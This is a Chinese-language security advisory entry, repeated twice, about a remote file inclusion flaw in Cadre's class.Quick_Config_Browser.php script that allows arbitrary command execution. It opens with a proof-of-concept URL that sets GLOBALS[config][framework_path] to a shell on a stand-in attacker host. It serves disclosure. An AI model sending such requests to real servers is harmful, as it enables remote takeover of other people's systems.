http://www.example.com/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php? Cadre是一款基于PHP的WEB应用程序。 Cadre不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'Class.Quick_Config_Browser.PHP'脚本对用户提交的'GLOBALS[config][framework_path]'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 目前没有解决方案提供,请关注以下链接: <a href="http://savannah.nongnu.org/projects/cadre/" target="_blank">http://savannah.nongnu.org/projects/cadre/</a>
http://www.example.com/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php? Cadre是一款基于PHP的WEB应用程序。 Cadre不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'Class.Quick_Config_Browser.PHP'脚本对用户提交的'GLOBALS[config][framework_path]'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 目前没有解决方案提供,请关注以下链接: <a href="http://savannah.nongnu.org/projects/cadre/" target="_blank">http://savannah.nongnu.org/projects/cadre/</a>